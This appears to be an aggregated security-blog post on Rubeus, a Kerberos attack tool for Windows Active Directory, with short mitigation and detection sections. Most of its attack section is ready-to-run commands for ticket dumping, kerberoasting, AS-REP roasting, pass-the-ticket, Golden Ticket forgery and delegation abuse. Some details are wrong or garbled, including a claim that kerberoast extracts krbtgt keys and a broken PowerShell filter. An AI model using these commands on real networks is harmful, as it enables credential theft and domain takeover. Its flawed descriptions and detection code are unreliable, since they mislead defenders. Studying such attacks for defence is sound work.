Extracting Kerberos Keys and NTLM Hashes with Rubeus: A PowerShell Offensive Security Technique

Listen to this Post

Featured Image
Yuval Gordon from Akamai revealed a PowerShell script that leverages Rubeus to extract Kerberos keys and NTLM hashes for every principal—including krbtgt and machines—without requiring code execution on the Domain Controller.

What is Rubeus?

Rubeus is a powerful offensive security tool designed for Kerberos exploitation in Windows Active Directory (AD) environments. It enables attackers to:
– Extract Kerberos tickets
– Forge Golden/Silver tickets
– Perform Pass-the-Ticket (PtT) attacks
– Dump NTLM hashes
– Execute Kerberos Relay attacks

Key Features of Rubeus:

  • Kerberos Ticket Extraction: Harvest TGTs and service tickets.
  • Overpass-the-Hash: Convert NTLM hashes into Kerberos tickets.
  • AS-REP Roasting: Retrieve AS-REP responses for offline cracking.
  • S4U Attacks (Delegation Abuse): Impersonate users via constrained delegation.

You Should Know: Practical Rubeus Commands & Mitigations

1. Extracting Kerberos Tickets & NTLM Hashes

 Dump all Kerberos tickets from memory 
Rubeus.exe dump

Extract Kerberos keys for all users (including krbtgt) 
Rubeus.exe kerberoast /outfile:hashes.txt

Request a TGT for a user (Pass-the-Ticket attack) 
Rubeus.exe asktgt /user:Administrator /rc4:<NTLM_HASH> /ptt 

2. AS-REP Roasting Attack

 Find users with Kerberos pre-authentication disabled 
Rubeus.exe asreproast /format:hashcat /outfile:asreproast_hashes.txt 

3. Golden Ticket Attack

 Forge a Golden Ticket using krbtgt hash 
Rubeus.exe golden /krbtgt:<KRBTGT_NTLM_HASH> /domain:corp.local /sid:<DOMAIN_SID> /user:fakeadmin /ptt 

4. Pass-the-Hash to Kerberos Conversion

 Convert NTLM hash to Kerberos ticket 
Rubeus.exe asktgt /user:Victim /rc4:<NTLM_HASH> /ptt 

5. S4U Delegation Abuse

 Impersonate a user via constrained delegation 
Rubeus.exe s4u /impersonateuser:Admin /msdsspn:http/web01.corp.local /altservice:cifs /ptt 

Mitigation Strategies

  1. Enable Kerberos Armoring (FAST) – Prevents ticket theft.

2. Restrict NTLM Usage – Enforce Kerberos-only authentication.

  1. Monitor for Rubeus Execution – Detect command-line arguments like dump, asktgt, or kerberoast.
  2. Implement LSA Protection – Block credential dumping via RunAsPPL.
  3. Disable Unnecessary Delegation – Audit and restrict constrained/unconstrained delegation.

🔗 Microsoft Threat Encyclopedia: HackTool:Win64/Rubeus

What Undercode Say

Rubeus remains a critical tool in red teaming & adversary simulations, but defenders must proactively harden Kerberos, disable weak protocols, and monitor for anomalous ticket requests.

Expected Linux & Windows Commands for Detection

 Linux (Detecting Kerberos anomalies with Zeek) 
zeek -r kerberos_traffic.pcap Kerberos::log_kerberos

Windows (Detect Rubeus execution via PowerShell logs) 
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -like "Rubeus" }

Hunt for Kerberoasting attempts 
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769} | Where-Object { $_.Properties[bash].Value -eq "0x40810000" } 

Expected Output:

[+] Detected Rubeus execution: 
- Process: powershell.exe 
- Command: Rubeus.exe kerberoast /outfile:hashes.txt 

Prediction

As Kerberos remains a prime target, future attacks will likely combine Rubeus with AI-driven automation to bypass detection. Defenders must adopt behavioral analytics and zero-trust models to counter these threats.

References:

Reported By: 0x534c Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram